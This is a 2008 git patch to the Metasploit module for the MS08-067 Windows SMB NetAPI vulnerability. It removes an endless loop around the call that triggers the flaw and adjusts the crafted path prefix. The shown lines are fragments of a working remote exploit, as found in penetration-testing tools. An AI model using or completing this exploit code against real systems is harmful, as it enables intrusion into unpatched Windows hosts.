From e9d133e9aab88795879879dc3da3432144786fa1 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Thu, 30 Oct 2008 07:21:53 +0000 Subject: [PATCH] Remove the while(true) which snuck into this module git-svn-id: file:///home/svn/framework3/trunk@5803 4d416f70-5f16-0410-b530-b9f4589650da --- modules/exploits/windows/smb/ms08_067_netapi.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index e74e3167cd..8c5c051e84 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb @@ -1,5 +1,5 @@ ## -# $Id:$ +# $Id$ ## ## @@ -218,7 +218,7 @@ class Metasploit3 < Msf::Exploit::Remote pad += c end - prefix = "" + prefix = "\\" server = Rex::Text.rand_text_alpha(rand(8)+1).upcase jumper = Rex::Text.rand_text_alpha(70).upcase @@ -272,9 +272,8 @@ class Metasploit3 < Msf::Exploit::Remote begin print_status("Triggering the vulnerability...") - while(true) - dcerpc.call(0x1f, stub) - end + dcerpc.call(0x1f, stub) + rescue Rex::Proto::DCERPC::Exceptions::NoResponse rescue => e if e.to_s !~ /STATUS_PIPE_DISCONNECTED/